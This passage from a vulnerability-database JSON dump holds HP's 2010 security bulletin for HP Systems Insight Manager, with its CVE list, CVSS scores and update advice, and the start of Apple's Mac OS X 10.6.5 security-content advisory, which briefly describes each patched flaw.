"CVE-2010-0082", "CVE-2010-2170", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2171", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-0847", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-0842", "CVE-2010-0845", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-0837", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-0849", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-0091", "CVE-2010-1297", "CVE-2010-0090", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-0093", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-0843", "CVE-2010-0084", "CVE-2010-0850", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02273751\r\nVersion: 1\r\n\r\nHPSBMA02547 SSRT100179 rev.1 - HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote\r\nExecution of Arbitrary Code and Other Vulnerabilities\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-07-12\r\nLast Updated: 2010-07-12\r\n\r\nPotential Security Impact: Remote execution of arbitrary code and other vulnerabilities\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified in HP Systems Insight Manager (SIM) for HP-UX, Linux,\r\nand Windows. 
The vulnerabilities could be exploited remotely to execute arbitrary code and other exploits.\r\n\r\nReferences: Adobe Flash Player\r\n\r\nCVE-2008-4546\r\n\r\nCVE-2009-3793\r\n\r\nCVE-2010-1297\r\n\r\nCVE-2010-2160\r\n\r\nCVE-2010-2161\r\n\r\nCVE-2010-2162\r\n\r\nCVE-2010-2163\r\n\r\nCVE-2010-2164\r\n\r\nCVE-2010-2165\r\n\r\nCVE-2010-2166\r\n\r\nCVE-2010-2167\r\n\r\nCVE-2010-2169\r\n\r\nCVE-2010-2170\r\n\r\nCVE-2010-2171\r\n\r\nCVE-2010-2172\r\n\r\nCVE-2010-2173\r\n\r\nCVE-2010-2174\r\n\r\nCVE-2010-2175\r\n\r\nCVE-2010-2176\r\n\r\nCVE-2010-2177\r\n\r\nCVE-2010-2178\r\n\r\nCVE-2010-2179\r\n\r\nCVE-2010-2180\r\n\r\nCVE-2010-2181\r\n\r\nCVE-2010-2182\r\n\r\nCVE-2010-2183\r\n\r\nCVE-2010-2184\r\n\r\nCVE-2010-2185\r\n\r\nCVE-2010-2186\r\n\r\nCVE-2010-2187\r\n\r\nCVE-2010-2188\r\n\r\nCVE-2010-2189\r\n\r\nJava Runtime Environment (JRE)\r\n\r\nCVE-2010-0082\r\n\r\nCVE-2010-0084\r\n\r\nCVE-2010-0085\r\n\r\nCVE-2010-0087\r\n\r\nCVE-2010-0088\r\n\r\nCVE-2010-0089\r\n\r\nCVE-2010-0090\r\n\r\nCVE-2010-0091\r\n\r\nCVE-2010-0092\r\n\r\nCVE-2010-0093\r\n\r\nCVE-2010-0094\r\n\r\nCVE-2010-0095\r\n\r\nCVE-2010-0837\r\n\r\nCVE-2010-0838\r\n\r\nCVE-2010-0839\r\n\r\nCVE-2010-0840\r\n\r\nCVE-2010-0841\r\n\r\nCVE-2010-0842\r\n\r\nCVE-2010-0843\r\n\r\nCVE-2010-0844\r\n\r\nCVE-2010-0845\r\n\r\nCVE-2010-0846\r\n\r\nCVE-2010-0847\r\n\r\nCVE-2010-0848\r\n\r\nCVE-2010-0849\r\n\r\nCVE-2010-0850\r\n\r\nTLS/SSL\r\n\r\nCVE-2009-3555\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows prior to v6.1.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2008-4546 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 4.3\r\nCVE-2009-3793 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-1297 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2160 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2161 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2162 
(AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2163 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2164 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2165 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2166 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2167 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2169 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2170 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2171 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2172 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\nCVE-2010-2173 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2174 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2175 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2176 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2177 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2178 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2179 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\r\nCVE-2010-2180 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2181 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2182 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2183 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2184 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2185 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2186 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2187 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2188 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2189 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-0082 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0084 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\nCVE-2010-0085 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0087 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0088 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2010-0089 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2010-0090 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8\r\nCVE-2010-0091 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\r\nCVE-2010-0092 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0093 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0094 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0095 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2010-0837 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0838 
(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0839 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0840 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0841 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0842 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0843 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0844 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0845 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0846 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0847 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0848 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0849 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0850 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows v6.1 or subsequent to resolve\r\nthese vulnerabilities.\r\nThe HP SIM v6.1 can be downloaded from http://www.hp.com/go/hpsim\r\n\r\nMANUAL ACTIONS: Yes - Update\r\nUpdate to HP SIM v6.1 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\r\nPatch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a\r\nspecific HP-UX system. It can also download patches and create a depot automatically. 
For more information\r\nsee: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n=============\r\nSysMgmtServer.MX-CMS\r\nSysMgmtServer.MX-CORE\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-PORTAL\r\nSysMgmtServer.MX-REPO\r\nSysMgmtServer.MX-TOOLS\r\naction: update to HP SIM v6.1 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 12 July 2010 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to 
update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided "as is" without warranty of any kind. 
To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkw7IkwACgkQ4B86/C0qfVlJ5QCfXkIKuTF7IcPYiRcmqfTLo8aQ\r\nCk0Anij/T6Lor5PRgLg5eharEx5Spcki\r\n=Wfca\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-07-18T00:00:00", "published": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24282", "title": "[security bulletin] HPSBMA02547 SSRT100179 rev.1 - HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Execution of Arbitrary Code and Other Vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-2500", "CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-4010", "CVE-2010-2160", "CVE-2010-1449", "CVE-2010-1832", "CVE-2009-0796", "CVE-2010-3640", "CVE-2010-1845", "CVE-2010-2161", "CVE-2010-1841", "CVE-2010-3786", "CVE-2009-0946", "CVE-2010-1846", "CVE-2010-3785", "CVE-2010-1843", "CVE-2010-3796", "CVE-2010-1833", "CVE-2010-2176", "CVE-2010-3790", "CVE-2010-2941", "CVE-2010-2177", "CVE-2010-2484", "CVE-2010-3798", "CVE-2010-1205", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-0434", 
"CVE-2010-2531", "CVE-2010-1844", "CVE-2010-1828", "CVE-2010-3789", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-1836", "CVE-2010-2166", "CVE-2010-1834", "CVE-2010-2807", "CVE-2010-1450", "CVE-2010-1847", "CVE-2010-3053", "CVE-2010-2808", "CVE-2010-2173", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-1842", "CVE-2010-0212", "CVE-2010-2165", "CVE-2010-1840", "CVE-2010-2170", "CVE-2010-0001", "CVE-2010-3645", "CVE-2010-0408", "CVE-2010-3638", "CVE-2010-3788", "CVE-2010-2171", "CVE-2010-2520", "CVE-2010-2805", "CVE-2010-2249", "CVE-2010-2806", "CVE-2010-2184", "CVE-2010-1752", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3784", "CVE-2010-3794", "CVE-2010-1811", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3793", "CVE-2010-3054", "CVE-2010-2181", "CVE-2010-3797", "CVE-2010-2163", "CVE-2010-0105", "CVE-2010-2519", "CVE-2010-3976", "CVE-2010-1803", "CVE-2010-2183", "CVE-2010-1850", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-3791", "CVE-2010-2169", "CVE-2010-1831", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-1378", "CVE-2010-2179", "CVE-2010-2498", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-0211", "CVE-2009-2473", "CVE-2010-3783", "CVE-2010-1848", "CVE-2010-2185", "CVE-2010-1837", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-2474", "CVE-2010-2499", "CVE-2010-2497", "CVE-2009-3793", "CVE-2010-1830", "CVE-2010-1838", "CVE-2010-1829", "CVE-2010-2167", "CVE-2010-3795", "CVE-2010-3647", "CVE-2010-1849", "CVE-2010-0397", "CVE-2010-3643", "CVE-2010-2162", "CVE-2009-4134", "CVE-2009-2624", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-3792", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-0205", "CVE-2010-3787", "CVE-2010-2178"], "description": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007\r\n\r\n * Last Modified: November 12, 2010\r\n * Article: HT4435\r\n\r\nEmail this article\r\nPrint this page\r\nSummary\r\n\r\nThis document describes the security content of Mac OS X v10.6.5 and Security Update 2010-007, 
which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security, Security Update 2010-007, Mac OS X v10.6.\r\nMac OS X v10.6.5 and Security Update 2010-007\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1828\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause AFP Server to unexpectedly shut down\r\n\r\n Description: A null pointer dereference exists in AFP Server's handling of reconnect authentication packets. A remote attacker may cause AFP Server to unexpectedly shut down. Mac OS X automatically restarts AFP Server after a shutdown. This issue is addressed through improved validation of reconnect packets. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1829\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An authenticated user may cause arbitrary code execution\r\n\r\n Description: A directory traversal issue exists in AFP Server, which may allow an authenticated user to create files outside of a share with the permissions of the user. With a system configuration where users are permitted file sharing access only, this may lead to arbitrary code execution. 
This issue is addressed through improved path validation. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1830\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may determine the existence of an AFP share\r\n\r\n Description: An error handling issue exists in AFP Server. This may allow a remote attacker to determine the existence of an AFP share with a given name. This issue is addressed through improved signaling of error conditions. Credit: Apple.\r\n\r\n *\r\n\r\n Apache mod_perl\r\n\r\n CVE-ID: CVE-2009-0796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause cross-site scripting against the web server\r\n\r\n Description: A cross-site scripting issue exists in Apache mod_perl's encoding of HTML output for the /perl-status page. An attacker may leverage this issue to inject arbitrary script code in the context of a web site served by Apache. This issue does not affect the default configuration as mod_perl and its status page are not enabled by default. This issue is addressed by properly escaping HTML output.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2010-0408, CVE-2010-0434\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Apache 2.2.14\r\n\r\n Description: Apache is updated to version 2.2.15 to address several vulnerabilities, the most serious of which may lead to a denial of service. 
Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n AppKit\r\n\r\n CVE-ID: CVE-2010-1842\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Rendering a bidirectional string that requires truncation may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in AppKit. If a string containing bidirectional text is rendered, and it is truncated with an ellipsis, AppKit may apply an inappropriate layout calculation. This could lead to an unexpected application termination or arbitrary code execution. This issue is addressed by avoiding the inappropriate layout calculation. Credit to Jesse Ruderman of Mozilla Corporation for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1831\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A buffer overflow exists in Apple Type Services' handling of embedded fonts with long names. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1832\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. 
On Mac OS X v10.6 systems this issue is mitigated by the -fstack-protector compiler flag. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1833\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Marc Schoenefeld of Red Hat, and Christoph Diehl of Mozilla for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-4010\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A signedness issue exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This issue is addressed through improved handling of CFF fonts. This issue does not affect Mac OS X v10.6 systems. Credit to Matias Eissler and Anibal Sacco of Core Security Technologies for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1752\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack overflow exists in CFNetwork's URL handling code. 
Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Laurent OUDOT of TEHTRI-Security, and Neil Fryer of IT Security Geeks for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1834\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may cause cookies to be set for other sites\r\n\r\n Description: An implementation issue exists in CFNetwork's handling of domain specifications in cookies. CFNetwork allows cookies to be set for a partial IP address. A maliciously crafted website may set a cookie that will be sent to a third-party site, if the third-party site is accessed by IP address. This update addresses the issue through improved validation of domains specified in cookies.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2010-1836\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination. On 32-bit systems, it may also lead to arbitrary code execution. This update addresses the issues through improved bounds and error checking. 
Credit to Andrew Kiss for reporting this issue.\r\n\r\n *\r\n\r\n CoreText\r\n\r\n CVE-ID: CVE-2010-1837\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in CoreText's handling of font files. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of font files. Credit: Apple.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2010-2941\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Internet Printing Protocol (IPP) requests in CUPS. By sending a maliciously crafted IPP request, a remote attacker may cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. This issue may only be triggered remotely on systems with Printer Sharing enabled. Printer Sharing is not enabled by default. Credit to Emmanuel Bouillon of NATO C3 Agency for reporting this issue.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1838\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local attacker may bypass the password validation and log in to a mobile account\r\n\r\n Description: An error handling issue exists in Directory Service. 
A local attacker with knowledge of the name of a disabled mobile account, or a mobile account that allows a limited number of login failures, may bypass the password validation and log in to the account. This issue is addressed through improved handling of disabled accounts.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1840\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An attacker may be able to cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Directory Services' password validation. An attacker may be able to cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT), and Rainer Mueller for reporting this issue.\r\n\r\n *\r\n\r\n diskdev_cmds\r\n\r\n CVE-ID: CVE-2010-0105\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may be able to prevent the system from starting properly\r\n\r\n Description: An implementation issue exists in fsck_hfs' handling of directory trees. A local user may be able to prevent the system from starting properly. This issue is addressed through improved validation of directory trees. Credit to Maksymilian Arciemowicz of SecurityReason for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2010-1841\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in processing UDIF disk images. 
